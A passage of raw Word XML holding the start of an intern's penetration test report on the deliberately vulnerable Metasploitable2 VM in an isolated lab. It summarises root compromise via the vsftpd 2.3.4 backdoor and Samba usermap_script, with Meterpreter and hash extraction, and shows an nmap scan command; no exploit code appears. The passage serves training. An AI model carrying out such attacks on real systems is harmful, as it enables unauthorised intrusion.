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C0764">
      <w:pPr>
        <w:spacing w:before="1600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>PENETRATION TESTING REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F186BC">
      <w:pPr>
        <w:spacing w:before="200" w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="44546A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Metasploitable2 Vulnerability Assessment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76C4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524F7B3E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Target System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76E040D6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Metasploitable2 (192.168.56.106)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7940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42D9E5B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Attacker System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DFBE430">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Kali Linux (192.168.56.101)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0C9E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2D73FB91">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D59EFE9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Isolated VirtualBox lab (host-only network)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="07DB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7A77C14">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Test Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4328FB51">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>July 2-3, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6E64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5F3621C9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Prepared By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35132FA4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Navya Bhatia</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="297E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29D8529E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Engagement Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1701BCB0">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Internship Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="44D30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340A3886">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="089E57F6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Confidential – Internal Training Use Only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1DE29F2D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADB2DA8">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229DD8D4">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This report documents a penetration test performed against Metasploitable2, an intentionally vulnerable Linux virtual machine used for security training. The engagement was carried out in an isolated VirtualBox lab environment as part of an internship task, with no production systems or external networks involved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BECD40">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The assessment followed the standard methodology of Reconnaissance, Scanning, Exploitation, Post-Exploitation, and Reporting. During scanning, the target was found to expose an extensive set of vulnerable services. Two critical vulnerabilities were exploited: a maliciously planted backdoor in vsftpd 2.3.4 (CVE-2011-2523), and a remote command injection flaw in Samba's “usermap_script” configuration option, both allowing unauthenticated remote attackers to obtain root-level access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C3874E">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Both exploitation attempts were successful. The vsftpd backdoor was triggered manually to obtain a root command shell. The Samba vulnerability was exploited using the Metasploit Framework to establish a full reverse shell, which was then upgraded to a Meterpreter session for advanced post-exploitation, including system enumeration and password hash extraction.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71632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Pr>
          <w:p w14:paraId="61320F19">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="1E4DFC2C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6004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2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7C816BD7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2DF51984">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2 (vsftpd 2.3.4 Backdoor; Samba usermap_script RCE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0579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FFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3C7F2D8F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Highest Privilege Obtained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6C9FED90">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>root (uid=0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="35F0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2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="36F4811D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open Ports Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="60387511">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0A1F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FFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0EE3F2DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sessions Obtained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6E0DD36F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1 root command shell (vsftpd); 1 Meterpreter session (Samba)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="11B5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F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7996EC75">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Overall Risk Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0E36B357">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E2B7C28">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2C1DAD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>2. Penetration Testing Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EC8454">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The engagement followed a five-phase methodology:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E78B0A1">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reconnaissance – Identify the target and gather preliminary network information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE26C34">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Scanning – Enumerate open ports, running services, and versions using Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F861F7">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exploitation – Identify and exploit a known vulnerability to gain unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C495D9F">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Post-Exploitation – Verify the level of access obtained and gather evidence of compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F43830">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reporting – Document findings, evidence, impact, and remediation guidance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E24CCBD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>2.1 Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184A7988">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To identify and exploit a known vulnerability present on the Metasploitable2 virtual machine, demonstrate real-world impact by obtaining a shell on the target, and document the full attack chain in a professional report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C9C9EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>3. Phase 1: Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B979AA">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The target was a known host on the internal lab network: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5213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326D751">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Target IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="086AA18D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>192.168.56.106</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6165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D10E9EF">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Attacker IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="368CC0DF">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>192.168.56.101 (Kali Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4182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36E2E728">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="338D0A87">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>VirtualBox Host-Only Adapter (isolated)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="79CF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68E678B9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Target OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5032C104">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Linux 2.6.24 (Ubuntu 8.04, i686) – Metasploitable2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0581A515">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Host discovery confirmed the target was live and reachable on the isolated lab network prior to scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541F4394">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>4. Phase 2: Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B7F645">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A version-detection scan was run against the target using Nmap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496FE622">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nmap -sV -T4 192.168.56.106</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A1EB9C">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key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00"/>
        <w:gridCol w:w="5650"/>
      </w:tblGrid>
      <w:tr w14:paraId="2988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Pr>
          <w:p w14:paraId="0BB39BF1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="1C35A29D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="04C566E3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="505F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2CC"/>
          </w:tcPr>
          <w:p w14:paraId="453926E8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>21/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC"/>
          </w:tcPr>
          <w:p w14:paraId="769503E0">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC"/>
          </w:tcPr>
          <w:p w14:paraId="53FA9710">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>vsftpd 2.3.4</w:t>
            </w:r>
